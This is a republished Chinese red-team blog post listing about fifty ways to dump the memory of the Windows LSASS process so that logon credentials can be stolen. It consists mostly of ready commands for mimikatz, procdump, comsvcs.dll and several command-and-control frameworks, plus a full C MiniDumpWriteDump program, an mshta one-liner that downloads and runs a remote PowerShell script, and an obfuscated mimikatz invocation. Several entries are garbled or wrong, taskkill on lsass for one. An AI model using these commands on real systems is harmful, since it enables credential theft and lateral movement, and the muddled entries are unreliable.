红队|Dump Lsass的50种方式
2023-4-19 20:33:37 Author: Z2O安全攻防(查看原文) 阅读量:139 收藏

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。

文章正文

Mimikatz

Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

ProcDump

Methods: procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp

Process Hacker

Methods: System->LSASS process->Create Dump

DumpIt

Methods: tasklist /FI “IMAGENAME eq lsass.exe” DumpIt.exe PID output_file_name.bin

Windows Debugging Tools

Methods: windbg -p .dump /ma c:\path\to\lsass.dmp .detach .q

FTK Imager

Methods: Create Disk Image Physical Drive Capture Memory LSASS.exe

Volatility

Methods: Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D

WinPmem

Methods: winpmem.exe -o dump.raw

hiberfil.sys

Methods: windbg.exe -y srvc:\symbolshttp://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma 

Windows Error Reporting

Methods: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe

LiveKd

Methods: LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]

Task Manager

Methods: Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=

Cobalt Strike+SharpDump

Methods: Execute-assembly SharpDump Or load sharpdump

sharpdump

Cobalt Strike+mimikatz_command

Methods: Mimikatz_command sekurlsa::minidump

Cobalt Strike+taskkill

Methods: taskkill /f /im lsass.exe

Cobalt Strike+Sysinternals

Methods: load sysinternals Procexp “File” -> “Save”

Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump “+strPID+” C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ‘ -Force;”

Brute Ratel C4+Kiwi

Methods: load kiwi Lsa_dump_sam lsa_dump_secrets

Metasploit+lsassy

Methods: use post/windows/gather/credentials/lsassy set SESSION Run or exploit

Covenant+SharpKatz

Methods: Create Task->Module->SharpKatz Arguments->lsa_dump

Empire+wmiexec

Methods: Modules credentials/mimikatz/lsass_dump Execute or run sekurlsa::minidump

Sliver+lsass_dump

Methods: use lsass_dump Options run

Villain

Methods: villain.exe agent villain.exe client -c villain.exe dump lsass

Octopus

Methods: pupy.exe shell –cmd “python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp”

NimPlant

Methods: lsassdump

PoshC2+MiniDumpWriteDump

Methods: MiniDumpWriteDump Get-LsassDumpProcDump

PoshC2+NtQueryVirtualMemory

Methods: NtQueryVirtualMemory Get-LsassDumpNtQueryVirtualMemory

PoshC2+BloodHound

Methods: Get-LsassDumpBloodHound

Manjusaka

Methods: mshta.exe javascript:A=new ActiveXObject(“WScript.Shell”).run(“powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(‘http://:/r.ps1')",0);close(); Manjusaka lsass dump

Dumpert

Methods: Dumpert.exe -k lsass.exe -s -o lsass.dmp

NanoDump

Methods: NanoDump.exe -t [process ID] -o [output file path]

Spraykatz

Methods: spraykatz.exe -w -u -p --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"

HandleKatz

Methods: HandleKatz.exe -p lsass.exe HandleKatz.exe -p lsass.exe -o [handle ID] -dump

CallBackDump

Methods: CallbackDump.exe -d -p

LsassSilentProcessExit

Methods: LsassSilentProcessExit.exe

AndrewSpecial

Methods: AndrewSpecial andrew.dmp!

Masky

Methods: .\Masky.exe /ca:’CA SERVER\CA NAME’ (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)

SharpMiniDump

Methods: SharpMiniDump.exe -p -o lsass.dmp

MiniDump

Methods: MiniDump.exe /p /o

LsassDumpReflectiveDll

Methods: Import-Module .\ReflectiveLsassDump.dll Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id

MoonSols Windows Memory Toolkit

Methods: MoonSolsWindowsMemoryToolkit.exe Dumping->Launch DumpIt LSASS->Select the process to dump

MiniDumpWriteDump

Methods: OpenProcess MiniDumpWriteDump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <windows.h>
#include <dbghelp.h>

int main()
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, <lsass_process_id>);
if (hProcess == NULL)
{
printf("Failed to open process: %u\n", GetLastError());
return 1;
}

WCHAR dumpFileName[MAX_PATH];
swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");

HANDLE hDumpFile = CreateFile(dumpFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("Failed to create dump file: %u\n", GetLastError());
CloseHandle(hProcess);
return 1;
}

BOOL success = MiniDumpWriteDump(hProcess, <lsass_process_id>, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
if (!success)
{
printf("Failed to create minidump: %u\n", GetLastError());
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 1;
}

CloseHandle(hDumpFile);
CloseHandle(hProcess);

return 0;
}

Comsvcs.dll

Methods: regsvr32 comsvcs.dll rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full

MirrorDump

Methods: .\MirrorDump.exe -f “NotLSASS.zip” -d “LegitLSAPlugin.dll” -l 1073741824

Dumpy

Methods: dumpy.exe dump -k secretKey -u http://remotehost/upload force

RToolZ+ProcExp152.sys

Methods: .\procexp64.exe -accepteula /t RToolZ -p

SharpUnhooker+LsassUnhooker

Methods: LsassUnhooker.exe -r SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin

hashdump

Methods: Kldumper.exe laZagne_x64.exe PwDump7.exe QuarksPwDump.exe SqlDumper.exe Wce_x64.exe SAMInside.exe

Mimikatz+Invoke-Obfuscation

Methods: Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(‘C:\mimikatz.exe’)) } -Command ‘Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA”)]))’Import-Module PowerSploit Invoke-Mimikatz -DumpCreds

BetterSafetyKatz

Methods: .\BetterSafetyKatz.exe .\BetterSafetyKatz.exe ‘.\mimikatz_trunk.zipSekurlsa::minidump

技术交流

知识星球

致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 200+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。

交流群

关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

关注我们

关注福利:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247494026&idx=1&sn=26049227aa58d91ada53f3cac28ba047&chksm=ceab02caf9dc8bdcbabbeebc22621fb2d2696d71362d975052b0c624bdffbce9a7915f3d48bd#rd
如有侵权请联系:admin#unsafe.sh